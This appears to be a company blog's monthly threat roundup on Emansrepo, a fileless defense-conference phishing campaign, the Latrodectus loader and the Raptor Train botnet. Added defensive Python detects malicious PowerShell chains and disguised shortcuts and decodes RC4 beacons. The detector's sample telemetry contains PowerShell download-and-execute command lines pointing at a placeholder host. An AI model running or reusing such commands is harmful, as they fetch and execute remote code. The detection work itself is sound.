Cybersecurity Threats Affecting Businesses in October 2024
The global cyber threat landscape remains highly elevated, with significant impacts reverberating across organizations of all sizes and sectors. Attackers persistently seek out vulnerable targets, often within industries historically underinvested in cybersecurity defenses. As these malicious actors hone their strategies, the repercussions of each attack become more severe, particularly as they set their sights on higher-value objectives.
Here are the top four threats that have emerged over the past month.
Emansrepo
FortiGuard Labs observed a Python-based infostealer named Emansrepo in August 2024. Emansrepo is spread via phishing emails containing fake purchase orders and invoices. It compresses stolen data, such as browser information and files, into a zip file and sends it to the attacker’s email. The campaign has been active since November 2023 and has evolved over time, increasing the complexity of its attack flow.
Emansrepo is distributed using multiple chains:
- Chain 1 uses a dropper that mimics a download page, leading to a malicious file that downloads additional components.
- Chain 2 involves an HTA file that executes a PowerShell script to download and run Emansrepo.
- Chain 3 uses a batch file to execute a PowerShell script that downloads and executes Emansrepo.
The infostealer operates in three parts:
- Collects login data, credit card information, and text files.
- Copies PDF files and compresses browser extensions, crypto wallets, and game platform folders.
- Zips and sends browser cookie files.
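Chains 2 and 3 above both end with a script host (mshta.exe for the HTA, cmd.exe for the batch file) launching PowerShell to fetch and run the payload. The following is an added detection example, not FortiGuard's or the malware's code: it checks constructed process-creation events for that parent/child pairing combined with download-cradle or window-hiding indicators; the event layout is a hypothetical simplification of EDR telemetry.

```python
"""Flag the Emansrepo delivery chains described above (HTA -> PowerShell,
batch -> PowerShell) in process-creation telemetry. Added example; the
event layout is a constructed simplification, not a real EDR schema."""
import re

# Script hosts that launch the HTA (chain 2) and batch (chain 3) stages.
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe"}
# Download cradles and launch helpers typical of a downloader stage.
DOWNLOAD_HINT = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
    r"start-bitstransfer|net\.webclient|invoke-expression|\biex\b",
    re.IGNORECASE,
)
# Flags used to hide the window or bypass policy while staging a payload.
EVASION_HINT = re.compile(
    r"-(enc|encodedcommand|w(indowstyle)?\s+hidden|nop|noprofile|ep\s+bypass)\b",
    re.IGNORECASE,
)

def is_suspicious_chain(event):
    """Return a reason string when a script host spawns PowerShell with
    download or evasion indicators in its command line, else None."""
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    child = event["image"].lower().rsplit("\\", 1)[-1]
    if child not in ("powershell.exe", "pwsh.exe") or parent not in SCRIPT_HOSTS:
        return None
    reasons = []
    if DOWNLOAD_HINT.search(event["cmdline"]):
        reasons.append("download-cradle")
    if EVASION_HINT.search(event["cmdline"]):
        reasons.append("evasion-flags")
    if not reasons:
        return None
    return f"{parent} -> {child}: {','.join(reasons)}"

# Constructed sample telemetry (parent image, child image, command line).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"parent": r"C:\Windows\System32\mshta.exe", "image": PS,
     "cmdline": 'powershell -w hidden -nop -c "iwr http://example.invalid/e.zip -OutFile e.zip; iex e"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": 'powershell -ep bypass -c "(New-Object Net.WebClient).DownloadFile(\'http://example.invalid/e.exe\',\'e.exe\')"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell Get-Process"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad"},
]

def scan(events=EVENTS):
    """Return (index, reason) pairs for events matching the chains."""
    return [(i, r) for i, e in enumerate(events) if (r := is_suspicious_chain(e))]
```

An interactive PowerShell session launched from Explorer (third event) produces no finding, which keeps the rule focused on the staged chains rather than on PowerShell use in general.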
Additionally, there is a related campaign that uses the Remcos malware with a simpler attack flow – the attacker sends phishing emails with malicious attachments that download and execute Remcos.
The attacks by Emansrepo and Remcos highlight the need for ongoing cybersecurity vigilance as these threats continuously evolve.
Fileless Attack Targets Attendees of Upcoming US-Taiwan Defense Industry Event
Cyble Research and Intelligence Labs found a campaign targeting the upcoming US-Taiwan Defense Industry Conference. The initial vector remains unknown, but the lure document found in the campaign hints at a simple spam/phishing email. The attack chain begins with an archive containing what appears to be a PDF file but is actually a Windows shortcut (.lnk). Once a user clicks it, thinking they are opening a PDF, the execution chain begins.
The LNK extracts a Base64-encoded .exe and a genuine PDF, so that the user sees the expected outcome of clicking the .lnk (an opened PDF file). The .exe is obfuscated with Confuser, a .NET obfuscation tool, to aid defense evasion. The file is placed in the startup folder for persistence and then retrieves further malicious content from a remote server: an XOR-encrypted DLL (again obfuscated) that is loaded directly into memory with .NET’s Assembly.Load function, avoiding detection by systems that focus on files written to disk. After this, encrypted C# code is downloaded, then compiled and executed entirely in memory as well.
The data gathered by that code (the usual infostealer targets such as passwords, cookies, credit card numbers, PII, etc.) is sent back to the threat actor’s server with the application/x-www-form-urlencoded content type, mimicking a standard form submission from a web browser to a specified URL. This URL points to a compromised website that the threat actor uses to host malicious content and receive the stolen data.
This is suspected to be the work of Chinese threat actors, but that has not been confirmed. Once again, however, the single linchpin of the entire campaign, despite advanced obfuscation tactics and in-memory execution, is simple social engineering. An end user with even light phishing-awareness training is a much harder target than one without it, and better able to withstand what is suspected to be a highly potent attack by a state actor for the purposes of state/industrial espionage.
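The lure hinges on an archive entry that looks like a PDF but is a Windows shortcut. As an added example (not part of the Cyble report), the check below identifies shortcut files inside a zip by the fixed Shell Link header rather than by name, so a double extension such as .pdf.lnk or a renamed shortcut is caught either way; the sample archive is constructed in memory.

```python
"""Check an archive for Windows shortcut (.lnk) files posing as documents,
the lure described above. Added example, not from the Cyble report; the
sample archive is constructed in memory."""
import io
import zipfile

# Shell Link header: HeaderSize 0x0000004C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} in its on-disk GUID byte order.
LNK_MAGIC = bytes.fromhex("4C000000" "01140200" "0000" "0000" "C000" "000000000046")
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")

def classify_entry(name, data):
    """Return a finding string for a suspicious entry, else None."""
    lower = name.lower()
    is_lnk = data[:len(LNK_MAGIC)] == LNK_MAGIC
    if not is_lnk:
        return None
    if lower.endswith(".lnk") and any(lower[:-4].endswith(e) for e in DOC_EXTS):
        return f"{name}: shortcut with document double extension"
    if not lower.endswith(".lnk"):
        return f"{name}: shortcut content under non-.lnk name"
    return f"{name}: shortcut file inside archive"

def scan_archive(blob):
    """Scan every file entry of a zip held in memory; only the header is read."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            findings.append(classify_entry(info.filename, zf.read(info)[:32]))
    return [f for f in findings if f]

def build_sample():
    """Constructed lure archive: a fake PDF that is really a shortcut, plus a real PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Conference_Agenda.pdf.lnk", LNK_MAGIC + b"\x00" * 40)
        zf.writestr("Conference_Agenda.pdf", b"%PDF-1.7\n%constructed\n")
    return buf.getvalue()
```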
Latrodectus Loader
Latrodectus, identified in early 2024 by Walmart researchers during an investigation of an IcedID campaign, is a malicious loader that shares network infrastructure, C2 traffic patterns, and DLL export addresses with IcedID. It is employed by multiple threat actors in phishing-based campaigns, and both Proofpoint and Palo Alto Networks’ Unit 42 have confirmed that victims received emails containing links leading to the download of Latrodectus.
The malware’s core capabilities include obtaining new C2 domains, running anti-analysis checks, downloading and executing different file types, and collecting system information. The distribution mechanism starts with emails, and observed delivery methods involve JavaScript files that either create other scripts or directly execute Latrodectus DLLs. Two threat actors, TA577 and TA578, have been identified using Latrodectus, employing tactics like thread hijacking and placing deceptive links in emails.
Latrodectus communicates with its C2 servers by sending host information in POST requests whose body is RC4-encrypted and Base64-encoded. The RC4 key, 12345, has been reused across samples. The information sent includes a request count, bot ID, OS version, system architecture, username, and campaign identifier.
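Because the RC4 key is reused across samples, an analyst can decode a captured check-in body offline. The following is an added example, not the malware's own code: it implements plain RC4, assumes the body is RC4-encrypted first and then Base64-encoded, assumes a key=value&... layout with hypothetical field names, and builds a constructed beacon to decode.

```python
"""Decode a captured Latrodectus-style check-in body: Base64 over RC4 with
the reused key "12345" as reported above. Added example, not the malware's
code; the ordering (RC4 then Base64), the key=value&... layout and the
field names are assumptions, and the sample beacon is constructed here."""
import base64
from urllib.parse import parse_qs

RC4_KEY = b"12345"  # key reused across samples, per the report

def rc4(key, data):
    """Plain RC4 (KSA + PRGA); symmetric, so it both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def decode_checkin(body):
    """Base64-decode the POST body, RC4-decrypt it and split the fields."""
    plain = rc4(RC4_KEY, base64.b64decode(body)).decode("utf-8", "replace")
    return {k: v[0] for k, v in parse_qs(plain, keep_blank_values=True).items()}

def build_sample_checkin():
    """Constructed beacon covering the data items the report lists
    (request count, bot ID, OS version, architecture, username, campaign);
    the field names are hypothetical."""
    fields = ("counter=1&bot_id=0123456789ABCDEF&os=10.0.19045&arch=x64"
              "&user=WORKSTATION\\jdoe&group=CONSTRUCTED_CAMPAIGN")
    return base64.b64encode(rc4(RC4_KEY, fields.encode())).decode()
```

Running `decode_checkin` over real captures only works while the key stays 12345; treat a decode that yields no readable fields as a sign the key or layout has changed.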
The C2 server can issue commands such as clearing or setting C2s, running executables, and collecting system data. Command handlers facilitate responses to C2 instructions, including retrieving file lists, running processes, and updating the malware.
Latrodectus is a threat tool that was detected over a year ago and is still running rampant in environments today. As always, the best defense is to never click a link that you cannot confirm is safe, and if you are ever in doubt, report suspicious links and emails to your company’s IT team.
Raptor Train
Cybersecurity researchers have uncovered a massive botnet known as “Raptor Train,” believed to be operated by a Chinese nation-state group, Flax Typhoon. This sophisticated botnet has been active since at least May 2020, compromising over 200,000 small office/home office (SOHO) and Internet of Things (IoT) devices. The botnet hit a peak of 60,000 actively infected devices in June 2023. These compromised devices, which include routers, IP cameras, and network storage devices from various manufacturers, have been primarily located in the U.S., Taiwan, and Brazil. Raptor Train is notable for its large scale, making it one of the biggest Chinese state-sponsored IoT botnets ever discovered.
The botnet operates through a three-tier architecture: compromised devices (Tier 1), command-and-control (C2) servers (Tier 2), and centralized management nodes (Tier 3). Although the implant does not persist across a device reboot, the botnet quickly re-infects devices thanks to the many available exploits for vulnerable hardware. By mid-2024, the infrastructure behind Raptor Train had grown, with more than 60 C2 servers active between June and August 2024. These servers are responsible for managing infections, executing commands, and facilitating further exploits on compromised devices.
A significant campaign linked to Raptor Train, called “Oriole,” was active from June 2023 to September 2024, targeting devices across sectors like telecommunications, military, and higher education. By June 2024, the botnet’s C2 domain had become so prominent that it appeared in major domain rankings such as Cisco Umbrella and Cloudflare Radar, giving it more reach while evading detection by domain whitelisting. Though no DDoS attacks have been confirmed, the botnet is suspected of carrying out exploitation attempts against vulnerable servers of major organizations, including Atlassian Confluence and Ivanti Connect Secure appliances.
In response, the FBI and the U.S. Department of Justice initiated a court-authorized operation in 2024 to dismantle the botnet. They successfully seized the attackers’ infrastructure and issued commands to remove the malware from thousands of infected devices. Despite attempts by the threat actors to disrupt the FBI’s operations through DDoS attacks, the law enforcement action highlighted the growing risk of botnets like Raptor Train, which allow state-sponsored groups to target global networks while concealing their activities.
If you’re facing challenges related to cybersecurity threats, breaches, and bad actors, or are interested in learning more about identifying potential threats to your organization, contact Marcum Technology today.